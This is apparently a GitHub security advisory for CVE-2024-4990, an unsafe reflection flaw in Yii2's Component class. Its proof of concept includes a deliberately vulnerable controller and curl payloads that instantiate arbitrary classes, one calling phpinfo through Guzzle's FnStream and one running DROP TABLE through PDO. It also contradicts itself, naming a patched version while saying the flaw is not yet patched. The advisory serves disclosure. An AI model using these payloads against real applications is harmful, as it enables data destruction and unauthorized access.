Skip to content

Unsafe Reflection in base Component class in yiisoft/yii2

High severity GitHub Reviewed Published May 30, 2024 in yiisoft/yii2 • Updated Jul 31, 2024

Package

composer yiisoft/yii2 (Composer)

Affected versions

< 2.0.49.4

Patched versions

2.0.49.4

Description

Yii2 supports attaching Behaviors to Components by setting properties having the format 'as <behaviour-name>'.

Internally this is done using the __set() magic method. If the value passed to this method is not an instance of the Behavior class, a new object is instantiated using Yii::createObject($value). However, there is no validation check that verifies that $value is a valid Behavior class name or configuration. An attacker that can control the content of the $value variable can then instantiate arbitrary classes, passing parameters to their constructors and then invoking setter methods.

Impact

With some effort malicious code can be injected executed which might be anything ranging from deleting files to dropping database tables

Patches

Not yet patched.

Workarounds

No Work around available

References

Reported Here

in case the link is dead, here is the full description

Description

Yii2 supports attaching Behaviors to Components by setting properties having the format 'as <behaviour-name>'.

Internally this is done using the __set() magic method. If the value passed to this method is not an instance of the Behavior class, a new object is instantiated using Yii::createObject($value). However, there is no validation check that verifies that $value is a valid Behavior class name or configuration. An attacker that can control the content of the $value variable can then instantiate arbitrary classes, passing parameters to their constructors and then invoking setter methods.

Depending on the installed dependencies various kind of attacks are possible.

Proof of Concept

A PoC application was created using composer create-project, as specified in the getting started.

Yii JSON parser was enabled in the configuration:

'parsers' => [ 'application/json' => 'yii\web\JsonParser' ]

A vulnerable controller was added:

<?php

namespace app\controllers;

use yii\base\Component;
use yii\web\Controller;

class ExploitableController extends Controller
{
    public function beforeAction($action): bool
    {
        // Needed only to simplify the PoC
        $this->enableCsrfValidation = false;
        return parent::beforeAction($action);
    }

    public function actionVulnerable(): string
    {
        $fields = $this->request->post();
        $myComponent = new Component();
        foreach ($fields as $key => $value) {
            $myComponent->$key = $value;
        }
        return "";
    }
}

Executing phpinfo()

Following command stores the content of phpinfo() inside info.html:

curl -XPOST -H "Content-Type: application/json" -d '{"as hack": {"__class":"GuzzleHttp\\Psr7\\FnStream", "__construct()": [[]], "_fn_close": "phpinfo"}}' http://localhost:8080/index.php?r=exploitable%2Fvulnerable > info.html

It leverages the fact that GuzzleHttp\Psr7\FnStream class executes call_user_func($this->_fn_close) inside __destruct(). This class is a default dependency.

Executing arbitrary MySQL queries (blind execution)

If the application is connected to a MySQL database it is possible to exploit the PDO class to execute arbitrary SQL queries:

curl -XPOST -H "Content-Type: application/json" -d '{"as hack": {"__class":"\\PDO", "__construct()": ["mysql:host=127.0.0.1;dbname=test", "test", "test", {"1002": "DROP TABLE test"}]}}' http://localhost:8080/index.php?r=exploitable%2Fvulnerable

Notice that the server will always return a 500 Internal Server Error (because the instantiated class is not a Behavior), however the query is executed, even if we can't receive any output from it. If the query fails we might see a PDO error message (i.e. "Table 'test.foo' doesn't exist"), depending on the app configuration.

Impact

It is not trivial to exploit this bug, because it depends on peculiar characteristics of the target application. However, it looks that there is at least one very popular product built on Yii2 that is severely affected by this vulnerability (allowing to an anonymous user to gain admin access, with an easy exploit).

The consequences of the exploitation could vary from retrieving sensitive information to DoS or unauthorized access.

Occurrences

Component.php L191

References

@samdark samdark published to yiisoft/yii2 May 30, 2024
Published to the GitHub Advisory Database Jun 2, 2024
Reviewed Jun 2, 2024
Last updated Jul 31, 2024

Severity

High

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
High
Privileges required
None
User interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
High

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Weaknesses

CVE ID

CVE-2024-4990

GHSA ID

GHSA-cjcc-p67m-7qxm

Source code

Credits

Loading Checking history
See something to contribute? Suggest improvements for this vulnerability.